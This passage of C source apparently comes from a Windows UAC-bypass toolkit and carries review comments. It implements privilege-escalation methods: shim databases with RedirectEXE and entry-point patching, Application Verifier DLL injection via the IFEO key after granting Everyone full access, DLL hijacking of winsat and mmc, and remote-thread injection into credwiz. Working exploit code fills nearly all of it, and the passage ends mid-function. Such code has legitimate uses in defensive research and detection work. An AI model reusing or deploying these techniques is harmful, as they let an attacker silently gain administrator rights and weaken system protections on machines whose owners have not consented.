    BOOL bResult = FALSE;
    PDB hShimDb;
    GUID dbGUID, exeGUID;
    WCHAR szTempDirectory[MAX_PATH * 2];
    WCHAR szShimDbPath[MAX_PATH * 2];
    WCHAR szSdbinstPath[MAX_PATH * 2];
    WCHAR szSystemDirectory[MAX_PATH];

    TAGID tidDB = 0;
    TAGID tidEXE = 0;
    TAGID tidMatchFile = 0;
    TAGID tidShim = 0;
    TAGID tidLib = 0;

    if (lpszPayloadEXE == NULL) {
        return bResult;
    }

    RtlSecureZeroMemory(szSdbinstPath, sizeof(szSdbinstPath));
    RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));

    if (!GetSystemDirectoryW(szSystemDirectory, MAX_PATH)) {
        return bResult;
    }
    // SHIM_SDBINSTALLER is a format taking the system directory.
    wsprintfW(szSdbinstPath, SHIM_SDBINSTALLER, szSystemDirectory);

    //
    // GUIDs are important, for both DATABASE and EXE file.
    // They used as shim identifiers and must to be set.
    //
    if (CoCreateGuid(&dbGUID) != S_OK) {
        return bResult;
    }
    if (CoCreateGuid(&exeGUID) != S_OK) {
        return bResult;
    }

    RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));
    // szShimDbPath was already zeroed above; this second clear is redundant.
    RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));

    if (!GetTempPathW(MAX_PATH, szTempDirectory)) {
        return bResult;
    }

    // GetTempPathW returns a path with a trailing backslash, hence no separator here.
    wsprintfW(szShimDbPath, L"%wspe386.sdb", szTempDirectory);

    hShimDb = SdbCreateDatabase(szShimDbPath, DOS_PATH);
    if (hShimDb == NULL) {
        return bResult;
    }

    //write shim DB header
    tidDB = SdbBeginWriteListTag(hShimDb, TAG_DATABASE);
    if (tidDB != TAGID_NULL) {

        SdbWriteStringTag(hShimDb, TAG_NAME, L"pe386");
        SdbWriteDWORDTag(hShimDb, TAG_OS_PLATFORM, 0x1); //win32 only RedirectEXE
        SdbWriteBinaryTag(hShimDb, TAG_DATABASE_ID, (PBYTE)&dbGUID, sizeof(GUID));

        //just as ACT 5.6 does
        // Empty LIBRARY list, written only for structural parity with ACT output.
        tidLib = SdbBeginWriteListTag(hShimDb, TAG_LIBRARY);
        if (tidLib != TAGID_NULL) SdbEndWriteListTag(hShimDb, tidLib);

        //write shim task information
        tidEXE = SdbBeginWriteListTag(hShimDb, TAG_EXE);
        if (tidEXE != TAGID_NULL) {
            SdbWriteStringTag(hShimDb, TAG_NAME, L"cliconfg.exe");
            SdbWriteStringTag(hShimDb, TAG_APP_NAME, L"cliconfg.exe");
            SdbWriteStringTag(hShimDb, TAG_VENDOR, L"Microsoft");
            SdbWriteBinaryTag(hShimDb, TAG_EXE_ID, (PBYTE)&exeGUID, sizeof(GUID));

            //write shim target info
            tidMatchFile = SdbBeginWriteListTag(hShimDb, TAG_MATCHING_FILE);
            if (tidMatchFile != TAGID_NULL) {
                SdbWriteStringTag(hShimDb, TAG_NAME, L"*"); //<-from any
                SdbWriteStringTag(hShimDb, TAG_COMPANY_NAME, SHIMPATCH_MSFTFULL);
                SdbWriteStringTag(hShimDb, TAG_INTERNAL_NAME, L"cliconfg.exe");
                SdbEndWriteListTag(hShimDb, tidMatchFile);
            }

            //write shim action info
            // The caller-supplied string becomes the RedirectEXE command line as-is.
            tidShim = SdbBeginWriteListTag(hShimDb, TAG_SHIM_REF);
            if (tidShim != TAGID_NULL) {
                SdbWriteStringTag(hShimDb, TAG_NAME, L"RedirectEXE");
                SdbWriteStringTag(hShimDb, TAG_COMMAND_LINE, lpszPayloadEXE);
                SdbEndWriteListTag(hShimDb, tidShim);
            }
            SdbEndWriteListTag(hShimDb, tidEXE);
        }
        SdbEndWriteListTag(hShimDb, tidDB);
    }
    // Closed unconditionally, even if TAG_DATABASE could not be started.
    SdbCloseDatabaseWrite(hShimDb);

    bResult = ucmRegisterAndRunTarget(szSystemDirectory, szSdbinstPath, szShimDbPath, L"%ws\\cliconfg.exe", FALSE);
    return bResult;
}
285 |
/*
* ucmShimPatch
*
* Purpose:
*
* Build, register shim patch database and execute target app with forced Entry Point Override.
* Aside from UAC bypass this is also dll injection technique.
*
* Parameters:
*
* ProxyDll, ProxyDllSize - image written to %temp%\r3.dll before the database is built.
*
* Return:
*
* Result of ucmRegisterAndRunTarget, FALSE on any earlier failure.
*
* Note:
*
* Artifacts left by this routine: %temp%\r3.dll (never removed here) and
* %temp%\amuzani.sdb (removed only by ucmRegisterAndRunTarget on the success path).
* Every "break" between SdbCreateDatabase and SdbCloseDatabaseWrite leaves hpdb
* open and the partially written database on disk. Return values of
* SdbBeginWriteListTag and most Sdb* writes are not checked. The do/while(cond)
* with cond always FALSE is the file's goto-free early-exit idiom.
*
*/
BOOL ucmShimPatch(
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize
    )
{
    BOOL bResult = FALSE, cond = FALSE;
    PDB hpdb;
    GUID dbGUID, exeGUID;

    WCHAR szTempDirectory[MAX_PATH * 2];
    WCHAR szShimDbPath[MAX_PATH * 2];
    WCHAR szSdbinstPath[MAX_PATH * 2];
    WCHAR szSystemDirectory[MAX_PATH];

    DWORD indexid = MAXDWORD, sz, epRVA = 0;
    TAGID dbrf, libref, patchref, exeref, matchfileref, patchfileref;
    PBYTE tmp;
    PPATCHBITS patchbits;

    RtlSecureZeroMemory(szSdbinstPath, sizeof(szSdbinstPath));
    RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));

    do {

        if (!GetSystemDirectoryW(szSystemDirectory, MAX_PATH)) {
            break;
        }
        wsprintfW(szSdbinstPath, SHIM_SDBINSTALLER, szSystemDirectory);

        if (CoCreateGuid(&dbGUID) != S_OK) {
            break;
        }
        if (CoCreateGuid(&exeGUID) != S_OK) {
            break;
        }

        RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));

        if (!GetTempPathW(MAX_PATH, szTempDirectory)) {
            break;
        }

        // drop Fubuki
        // szShimDbPath is temporarily reused for the dll path; it is
        // overwritten with the real .sdb path a few lines below.
        RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));
        wsprintfW(szShimDbPath, L"%wsr3.dll", szTempDirectory);
        if (!supWriteBufferToFile(szShimDbPath, ProxyDll, ProxyDllSize))
        {
            break;
        }

        RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));

        wsprintfW(szShimDbPath, L"%wsamuzani.sdb", szTempDirectory);

        hpdb = SdbCreateDatabase(szShimDbPath, DOS_PATH);
        if (hpdb == NULL) {
            break;
        }

        // Index on EXE/NAME; the breaks below leak hpdb (see header note).
        if (!SdbDeclareIndex(hpdb, TAG_EXE, TAG_NAME, 1, TRUE, &indexid)) {
            break;
        }
        if (!SdbStartIndexing(hpdb, indexid)) {
            break;
        }
        SdbStopIndexing(hpdb, indexid);
        SdbCommitIndexes(hpdb);

        // begin DATABASE {
        dbrf = SdbBeginWriteListTag(hpdb, TAG_DATABASE);
        if (!SdbWriteStringTag(hpdb, TAG_NAME, L"amuzani")) {
            break;
        }
        SdbWriteBinaryTag(hpdb, TAG_DATABASE_ID, (PBYTE)&dbGUID, sizeof(GUID));
        SdbWriteDWORDTag(hpdb, TAG_OS_PLATFORM, 0x1); //<- win32

        // begin LIBRARY {
        libref = SdbBeginWriteListTag(hpdb, TAG_LIBRARY);

        patchref = SdbBeginWriteListTag(hpdb, TAG_PATCH); // begin LIBRARY-PATCH
        SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_BINARYNAME);

        // query EP RVA for target
        // szTempDirectory now holds "<system dir>\<SHIMPATCH_EXENAME>", not a directory.
        RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));
        wsprintfW(szTempDirectory, L"%ws\\%ws", szSystemDirectory, SHIMPATCH_EXENAME);
        epRVA = supQueryEntryPointRVA(szTempDirectory);
        if (epRVA == 0) {
            break;
        }

        // Fixed 32 KiB scratch buffer for one PATCHBITS record plus patchcode32.
        // If the allocation fails the PATCH list is still closed and written
        // without TAG_PATCH_BITS, and the function carries on.
        tmp = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 32 * 1024);
        if (tmp != NULL) {
            patchbits = (PPATCHBITS)tmp;
            sz = 0;
            patchbits->Opcode = PATCH_REPLACE;
            patchbits->RVA = epRVA;
            _strcpy_w(patchbits->ModuleName, SHIMPATCH_EXENAME);
            // NOTE(review): supCopyMemory argument order assumed (dst, dstsize, src, srcsize) - confirm.
            supCopyMemory((char *)&patchbits->Pattern, sizeof(patchcode32), patchcode32, sizeof(patchcode32));
            patchbits->PatternSize = sizeof(patchcode32);
            patchbits->ActionSize = sizeof(PATCHBITS) + patchbits->PatternSize;
            sz += patchbits->ActionSize;
            SdbWriteBinaryTag(hpdb, TAG_PATCH_BITS, tmp, sz);
            HeapFree(GetProcessHeap(), 0, tmp);
        }
        SdbEndWriteListTag(hpdb, patchref); // end LIBRARY-PATCH

        // end LIBRARY
        SdbEndWriteListTag(hpdb, libref);

        SdbStartIndexing(hpdb, indexid);

        // begin EXE {
        exeref = SdbBeginWriteListTag(hpdb, TAG_EXE);
        SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_EXENAME);
        SdbWriteStringTag(hpdb, TAG_APP_NAME, SHIMPATCH_EXENAME);
        SdbWriteBinaryTag(hpdb, TAG_EXE_ID, (PBYTE)&exeGUID, sizeof(GUID));

        // begin MATCH {
        matchfileref = SdbBeginWriteListTag(hpdb, TAG_MATCHING_FILE);
        SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_EXENAME);
        SdbWriteStringTag(hpdb, TAG_COMPANY_NAME, SHIMPATCH_MSFTFULL);
        SdbEndWriteListTag(hpdb, matchfileref); // } end MATCH

        // PATCH_REF ties the EXE entry back to the LIBRARY patch via its TAGID.
        patchfileref = SdbBeginWriteListTag(hpdb, TAG_PATCH_REF);
        SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_BINARYNAME);
        SdbWriteDWORDTag(hpdb, TAG_PATCH_TAGID, patchref);
        SdbEndWriteListTag(hpdb, patchfileref);

        SdbEndWriteListTag(hpdb, exeref); // } end EXE

        // } end DATABASE
        SdbEndWriteListTag(hpdb, dbrf);

        SdbCloseDatabaseWrite(hpdb);

        // Register db and run target.
        // NOTE(review): the literal target is iscsicli.exe while the patch is keyed
        // on SHIMPATCH_EXENAME; presumably the same name - verify in consts.h.
        bResult = ucmRegisterAndRunTarget(szSystemDirectory, szSdbinstPath, szShimDbPath, L"%ws\\iscsicli.exe", TRUE);

    } while (cond);

    return bResult;
}
437 |
/*
* ucmAppcompatElevation
*
* Purpose:
*
* AutoElevation using Application Compatibility engine.
*
* Parameters:
*
* Method                 - UacMethodRedirectExe or UacMethodShimPatch; any other value is a no-op.
* ProxyDll, ProxyDllSize - forwarded to ucmShimPatch (ShimPatch method only).
* lpszPayloadEXE         - RedirectEXE command line; NULL selects the cmd.exe default.
*
* Return:
*
* Result of the selected method, FALSE if apphelp.dll could not be loaded or
* its exports could not be resolved.
*
* Note:
*
* hAppHelp is a file-scope handle set here and never released by this
* function on either path. The RedirectExe branch returns from inside the
* do/while directly, which is equivalent to the loop's own fall-through exit.
*
*/
BOOL ucmAppcompatElevation(
    UACBYPASSMETHOD Method,
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize,
    LPWSTR lpszPayloadEXE
    )
{
    BOOL cond = FALSE, bResult = FALSE;
    WCHAR szBuffer[MAX_PATH * 2];

    do {

        // Buffer is MAX_PATH*2 characters but only MAX_PATH is offered to the expansion.
        RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
        if (ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\apphelp.dll"),
            szBuffer, MAX_PATH) == 0)
        {
            break;
        }

        // Loaded by full expanded path; ucmInitAppHelp resolves the Sdb* exports from it.
        hAppHelp = LoadLibrary(szBuffer);
        if (hAppHelp == NULL) {
            break;
        }

        if (ucmInitAppHelp() == FALSE) {
            break;
        }

        //create and register shim with RedirectEXE, cmd.exe as payload
        if (Method == UacMethodRedirectExe) {

            if (lpszPayloadEXE == NULL) {
                // Stored unexpanded; presumably the shim engine expands %systemroot% - confirm.
                _strcpy_w(szBuffer, L"%systemroot%\\system32\\cmd.exe");
                bResult = ucmShimRedirectEXE(szBuffer);
            }
            else {
                bResult = ucmShimRedirectEXE(lpszPayloadEXE);
            }
            return bResult;
        }
        //create and register shim patch with fubuki as payload
        if (Method == UacMethodShimPatch) {
            bResult = ucmShimPatch(ProxyDll, ProxyDllSize);
        }

    } while (cond);

    return bResult;
}
495 |
--------------------------------------------------------------------------------
/BypassUAC/gootkit.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2014 - 2016,
4 | * (C) Original idea (?) mzH,
5 | * (C) FixIT Shim Patches by Jon Erickson
6 | *
7 | * TITLE: GOOTKIT.H
8 | *
9 | * VERSION: 2.00
10 | *
11 | * DATE: 16 Nov 2015
12 | *
13 | * Prototypes and definitions for Gootkit method.
14 | *
15 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
16 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
17 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
18 | * PARTICULAR PURPOSE.
19 | *
20 | *******************************************************************************/
21 | #pragma once
22 |
/*
* ucmAppcompatElevation
*
* Entry point of the Gootkit (Application Compatibility engine) method.
* Loads apphelp.dll and dispatches on Method: UacMethodRedirectExe builds a
* RedirectEXE shim for lpszPayloadEXE (cmd.exe when NULL), UacMethodShimPatch
* builds a shim patch database around ProxyDll/ProxyDllSize.
* Returns TRUE only if the target application was launched.
*/
BOOL ucmAppcompatElevation(
    UACBYPASSMETHOD Method,
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize,
    LPWSTR lpszPayloadEXE
    );
29 |
--------------------------------------------------------------------------------
/BypassUAC/hybrids.c:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015 - 2016
4 | *
5 | * TITLE: HYBRIDS.C
6 | *
7 | * VERSION: 2.01
8 | *
9 | * DATE: 04 Jan 2016
10 | *
11 | * Hybrid UAC bypass methods.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #include "global.h"
20 | #include "makecab.h"
21 |
22 | #include
23 | #pragma comment(lib, "shlwapi.lib")
24 |
// Parameter block for ucmElevatedLaunchProc. Filled in by ucmSirefefMethod and
// copied into the remote process as part of the whole module image, so its
// in-image offset is what the remote thread receives as its argument.
ELOAD_PARAMETERS_4 g_ElevParamsSirefef;
26 |
/*
* ucmAvrfMethod
*
* Purpose:
*
* Acquire elevation through Application Verifier dll injection.
*
* Parameters:
*
* AvrfDll, AvrfDllSize - verifier provider image packed into the cabinet by
*                        ucmCreateCabinetForSingleFile.
*
* Return:
*
* Result of launching METHOD_SQLSRV_TARGETAPP, FALSE on any earlier failure.
*
* Note:
*
* Persistent artifacts this routine does NOT revert: the DACL rewritten on the
* IFEO key (see "Red Alert" below) and the IFEO\cliconfg.exe subkey with
* GlobalFlag=0x100 and VerifierDlls. Both remain after return regardless of
* outcome and are the primary observable traces of this method.
*
*/
BOOL ucmAvrfMethod(
    CONST PVOID AvrfDll,
    DWORD AvrfDllSize
    )
{
    BOOL bResult = FALSE, cond = FALSE;
    HKEY hKey = NULL, hSubKey = NULL;
    LRESULT lRet; // registry APIs return LSTATUS; LRESULT is wider but holds it.
    DWORD dwValue = 0x100; // FLG_APPLICATION_VERIFIER;
    WCHAR szCmd[MAX_PATH * 4];

    if (
        (AvrfDll == NULL) ||
        (AvrfDllSize == 0)
        )
    {
        return bResult;
    }

    do {

        //
        // Set new key security dacl
        // Red Alert: manually restore IFEO key permissions after using this tool, as they are not inherited.
        //
        if (!ucmSimdaAlterObjectSecurity(SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, T_IFEO, T_SDDL_ALL_FOR_EVERYONE))
            break;

        //open IFEO key
        lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"),
            0, KEY_ALL_ACCESS, &hKey);
        if ((lRet != ERROR_SUCCESS) || (hKey == NULL))
            break;

        //Set new key and values
        hSubKey = NULL;
        lRet = RegCreateKey(hKey, TEXT("cliconfg.exe"), &hSubKey);
        if ((hSubKey == NULL) || (lRet != ERROR_SUCCESS))
            break;

        lRet = RegSetValueEx(hSubKey, TEXT("GlobalFlag"), 0, REG_DWORD, (BYTE*)&dwValue, sizeof(DWORD));
        if (lRet != ERROR_SUCCESS)
            break;

        // dwValue is reused as the byte length of the REG_SZ data. It excludes the
        // terminating NUL, and it is computed with _strlen rather than _strlen_w;
        // NOTE(review): confirm _strlen matches the character type of T_AVRFDLL.
        // "&T_AVRFDLL" is only correct if T_AVRFDLL is an array, not a pointer.
        dwValue = (DWORD)_strlen(T_AVRFDLL) * sizeof(TCHAR);
        lRet = RegSetValueEx(hSubKey, TEXT("VerifierDlls"), 0, REG_SZ, (BYTE*)&T_AVRFDLL, dwValue);
        if (lRet != ERROR_SUCCESS)
            break;

        // Cleanup registry, we don't need anymore.
        // Only the handles are closed; the key and values stay in place.
        RegCloseKey(hSubKey);
        hSubKey = NULL;
        RegCloseKey(hKey);
        hKey = NULL;

        //
        // Extract file to the protected directory
        // First, create cab with fake msu ext, second run fusion process.
        //
        if (!ucmCreateCabinetForSingleFile(T_AVRF_SOURCEDLL, AvrfDll, AvrfDllSize))
            break;

        // Drop Hibiki to system32
        if (!ucmWusaExtractPackage(T_AVRF_CMDLINE))
            break;

        // Finally run target fusion process.
        RtlSecureZeroMemory(szCmd, sizeof(szCmd));
        if (ExpandEnvironmentStringsW(METHOD_SQLSRV_TARGETAPP,
            szCmd, MAX_PATH) == 0)
        {
            break;
        }
        bResult = supRunProcess(szCmd, NULL);

    } while (cond);

    // Handles are still open only if a break happened before the explicit closes above.
    if (hKey != NULL) {
        RegCloseKey(hKey);
    }
    if (hSubKey != NULL) {
        RegCloseKey(hSubKey);
    }
    return bResult;
}
120 |
/*
* ucmWinSATMethod
*
* Purpose:
*
* Acquire elevation through abusing APPINFO.DLL whitelisting model logic and wusa installer/IFileOperation autoelevation.
* Slightly modified target and proxydll can work almost with every autoelevated/whitelisted application.
* This method uses advantage of wusa to write to the protected folders, but can be adapted to IFileOperation too.
* WinSAT used for demonstration purposes only.
*
* Parameters:
*
* lpTargetDll            - file name (at most 100 characters) the proxy dll is written under.
* ProxyDll, ProxyDllSize - proxy dll image.
* UseWusa                - TRUE: package both files in a cabinet and extract with wusa;
*                          FALSE: copy them with ucmAutoElevateCopyFile.
*
* Return:
*
* Result of launching T_WINSAT_TARGET, FALSE on any earlier failure.
*
* Note:
*
* Temp artifacts (%temp%\winsat.exe and %temp%\<lpTargetDll>) are deleted at
* the end on every path; files placed in the target directory are not.
* The result of ucmWusaExtractPackage is ignored, so a failed extraction is
* only noticed when the target launch fails.
*
*/
BOOL ucmWinSATMethod(
    LPWSTR lpTargetDll,
    PVOID ProxyDll,
    DWORD ProxyDllSize,
    BOOL UseWusa
    )
{
    BOOL bResult = FALSE, cond = FALSE;
    CABDATA *Cabinet = NULL;
    WCHAR szSource[MAX_PATH + 1];
    WCHAR szDest[MAX_PATH + 1];
    WCHAR szBuffer[MAX_PATH + 1];

    if (
        (ProxyDll == NULL) ||
        (ProxyDllSize == 0) ||
        (lpTargetDll == NULL)
        )
    {
        return bResult;
    }

    // Bounds the TEMPDIR + lpTargetDll concatenation below within szBuffer.
    if (_strlen_w(lpTargetDll) > 100) {
        return bResult;
    }

    // Zeroed up front because the cleanup at the end tests szDest[0]/szSource[0].
    RtlSecureZeroMemory(szSource, sizeof(szSource));
    RtlSecureZeroMemory(szDest, sizeof(szDest));

    do {

        if (ExpandEnvironmentStrings(L"%systemroot%\\system32\\winsat.exe",
            szSource, MAX_PATH) == 0)
        {
            break;
        }

        if (ExpandEnvironmentStrings(L"%temp%\\winsat.exe",
            szDest, MAX_PATH) == 0)
        {
            break;
        }

        // Copy winsat to temp directory
        if (!CopyFile(szSource, szDest, FALSE)) {
            break;
        }

        //put target dll
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, TEMPDIR);
        _strcat_w(szBuffer, lpTargetDll);


        //expand string for proxy dll
        // szSource is reused: from here on it is the proxy dll path in %temp%.
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
            break;
        }

        //write proxy dll to disk
        if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
            break;
        }

        //
        // Two options: use wusa installer or IFileOperation
        //
        if ( UseWusa ) {

            //build cabinet
            RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
            if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME,
                szBuffer, MAX_PATH) == 0)
            {
                break;
            }

            Cabinet = cabCreate(szBuffer);
            if (Cabinet) {

                //expand string for winsat.exe
                // szDest already holds this value from above; a break here
                // leaves Cabinet open for the cabClose after the loop.
                if (ExpandEnvironmentStrings(L"%temp%\\winsat.exe",
                    szDest, MAX_PATH) == 0)
                {
                    break;
                }

                //put proxy dll inside cabinet
                cabAddFile(Cabinet, szSource, lpTargetDll);

                //put winsat.exe
                cabAddFile(Cabinet, szDest, L"winsat.exe");
                cabClose(Cabinet);
                Cabinet = NULL;
            }
            else {
                break;
            }

            //extract package
            // Return value not checked.
            ucmWusaExtractPackage(T_WINSAT_CMDLINE);

            RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
            if (ExpandEnvironmentStrings(T_WINSAT_TARGET, szBuffer, MAX_PATH) == 0) {
                break;
            }
            bResult = supRunProcess(szBuffer, NULL);
        }
        else {

            //wusa extract banned, switch to IFileOperation.
            RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
            if (ExpandEnvironmentStringsW(M1W7_TARGETDIR,
                szBuffer, MAX_PATH) == 0)
            {
                break;
            }
            bResult = ucmAutoElevateCopyFile(szSource, szBuffer);
            if (!bResult) {
                break;
            }
            bResult = ucmAutoElevateCopyFile(szDest, szBuffer);
            if (!bResult) {
                break;
            }

            // Yields the time slice; no synchronization with the copies is implied.
            Sleep(0);

            //run winsat
            RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
            if (ExpandEnvironmentStrings(T_WINSAT_TARGET, szBuffer, MAX_PATH) == 0) {
                break;
            }
            bResult = supRunProcess(szBuffer, NULL);
            //cleanup of the above files must be done by payload code
        }

    } while (cond);

    if (Cabinet) {
        cabClose(Cabinet);
    }
    //remove trash from %temp%
    if (szDest[0] != 0) {
        DeleteFileW(szDest);
    }
    if (szSource[0] != 0) {
        DeleteFileW(szSource);
    }

    return bResult;
}
285 |
/*
* ucmMMCMethod
*
* Purpose:
*
* Bypass UAC by abusing MMC.exe backdoor hardcoded in appinfo.dll
*
* Parameters:
*
* lpTargetDll            - file name (at most 100 characters) the proxy dll is written under.
* ProxyDll, ProxyDllSize - proxy dll image.
*
* Return:
*
* Result of launching "mmc.exe eventvwr.msc", FALSE on any earlier failure.
*
* Note:
*
* Unlike ucmWinSATMethod, the temporary copy in %temp% (szSource) is never
* deleted here, and the dll placed under SYSTEMROOTDIR is left in place.
*
*/
BOOL ucmMMCMethod(
    LPWSTR lpTargetDll,
    PVOID ProxyDll,
    DWORD ProxyDllSize
    )
{
    BOOL bResult = FALSE, cond = FALSE;
    WCHAR szSource[MAX_PATH + 1];
    WCHAR szDest[MAX_PATH + 1];
    WCHAR szBuffer[MAX_PATH + 1];

    if (
        (ProxyDll == NULL) ||
        (ProxyDllSize == 0) ||
        (lpTargetDll == NULL)
        )
    {
        return bResult;
    }

    // Bounds the TEMPDIR + lpTargetDll concatenation below within szBuffer.
    if (_strlen_w(lpTargetDll) > 100) {
        return bResult;
    }

    do {

        //put target dll
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, TEMPDIR);
        _strcat_w(szBuffer, lpTargetDll);

        //expand string for proxy dll
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
            break;
        }

        //write proxy dll to disk
        if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
            break;
        }

        //expand string for target dir
        RtlSecureZeroMemory(szDest, sizeof(szDest));
        if (ExpandEnvironmentStringsW(SYSTEMROOTDIR,
            szDest, MAX_PATH) == 0)
        {
            break;
        }

        //drop fubuki to system32
        bResult = ucmAutoElevateCopyFile(szSource, szDest);
        if (!bResult) {
            break;
        }

        //run mmc console
        //because of mmc harcoded backdoor uac will autoelevate mmc with valid and trusted MS command
        //event viewer will attempt to load not existing dll, so we will give him our little friend
        // Launched by bare name; resolution of "mmc.exe" is left to supRunProcess.
        bResult = supRunProcess(L"mmc.exe", L"eventvwr.msc");

    } while (cond);

    return bResult;
}
359 |
/*
* ucmElevatedLaunchProc
*
* Purpose:
*
* Remote-thread routine: ShellExecuteExW the application named in elvpar with
* the given verb and wait for it to exit.
*
* Parameters:
*
* elvpar - pointer to an ELOAD_PARAMETERS_4 block (the copy of
*          g_ElevParamsSirefef inside the host process image).
*
* Return:
*
* E_FAIL if elvpar is NULL, otherwise S_OK - even when ShellExecuteExW fails.
*
* Note:
*
* ucmSirefefMethod copies this module's image into another process and starts
* this routine there at a different base, so it only calls through the function
* pointers in elvpar and touches no imports or globals of its own.
* SHELLEXECUTEINFOW is not zero-initialized: only the seven fields below are
* set and the remaining members (hwnd, lpIDList, lpClass, hkeyClass, dwHotKey,
* hIcon, hInstApp) are left indeterminate. Presumably a zeroing call was avoided
* to keep the routine free of external references - confirm before changing.
*
*/
DWORD WINAPI ucmElevatedLaunchProc(
    PELOAD_PARAMETERS_4 elvpar
    )
{
    BOOL cond = FALSE;
    SHELLEXECUTEINFOW shexec;

    if (elvpar == NULL)
        return (DWORD)E_FAIL;

    // Single-pass do/while; there is no break, so the loop runs exactly once.
    do {

        shexec.cbSize = sizeof(shexec);
        shexec.fMask = SEE_MASK_NOCLOSEPROCESS;
        shexec.nShow = SW_SHOW;
        shexec.lpVerb = elvpar->szVerb;
        shexec.lpFile = elvpar->szTargetApp;
        shexec.lpParameters = NULL;
        shexec.lpDirectory = NULL;
        if (elvpar->xShellExecuteExW(&shexec))
            if (shexec.hProcess != NULL) {
                elvpar->xWaitForSingleObject(shexec.hProcess, INFINITE);
                elvpar->xCloseHandle(shexec.hProcess);
            }

    } while (cond);

    return S_OK;
}
389 |
/*
* ucmSirefefMethod
*
* Purpose:
*
* Bypass UAC by abusing OOBE.exe backdoor hardcoded in appinfo.dll
*
* Parameters:
*
* ProxyDll, ProxyDllSize - proxy dll image, written as netutils.dll.
*
* Return:
*
* TRUE if the remote thread in the first-stage process was created; the outcome
* of the second stage launched by that thread is not reported back.
*
* Note:
*
* Observable behaviour of this routine: %temp%\netutils.dll and %temp%\oobe.exe
* (a renamed copy of credwiz.exe) are created and then placed under WBEMDIR;
* credwiz.exe is started, receives a PAGE_EXECUTE_READWRITE copy of this whole
* module via VirtualAllocEx/WriteProcessMemory, and runs ucmElevatedLaunchProc
* through CreateRemoteThread; credwiz.exe is then terminated unconditionally.
* Temp files are not removed here.
*
* The image copy is not relocated, so the remote routine must be position
* independent (it only calls through g_ElevParamsSirefef). The absolute
* shell32/kernel32 addresses stored in that block are assumed to be valid in
* the target process as well - NOTE(review): confirm this assumption holds.
*
*/
BOOL ucmSirefefMethod(
    PVOID ProxyDll,
    DWORD ProxyDllSize
    )
{
    BOOL cond = FALSE, bResult = FALSE;
    DWORD c; // thread id out-param of CreateRemoteThread, otherwise unused.
    HANDLE hProcess = NULL, hRemoteThread = NULL;
    HINSTANCE selfmodule = GetModuleHandle(NULL);
    // PE header walk on our own image, done before any NULL check on selfmodule.
    PIMAGE_DOS_HEADER pdosh = (PIMAGE_DOS_HEADER)selfmodule;
    PIMAGE_FILE_HEADER fh = (PIMAGE_FILE_HEADER)((char *)pdosh + pdosh->e_lfanew + sizeof(DWORD));
    PIMAGE_OPTIONAL_HEADER opth = (PIMAGE_OPTIONAL_HEADER)((char *)fh + sizeof(IMAGE_FILE_HEADER));
    LPVOID remotebuffer = NULL, newEp, newDp;
    SIZE_T NumberOfBytesWritten = 0; // filled by WriteProcessMemory, never compared.
    PELOAD_PARAMETERS_4 elvpar = &g_ElevParamsSirefef;
    LPVOID elevproc = ucmElevatedLaunchProc;

    WCHAR szBuffer[MAX_PATH * 2];
    WCHAR szDest[MAX_PATH + 1];
    WCHAR szSource[MAX_PATH + 1];

    if (
        (ProxyDll == NULL) ||
        (ProxyDllSize == 0)
        )
    {
        return bResult;
    }

    do {
        //put Fubuki dll as netutils to %temp%
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, TEMPDIR);
        _strcat_w(szBuffer, L"netutils.dll");
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
            break;
        }
        if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
            break;
        }

        //copy dll to wbem target folder
        // szBuffer holds the expanded WBEMDIR from here until the shellcode setup below.
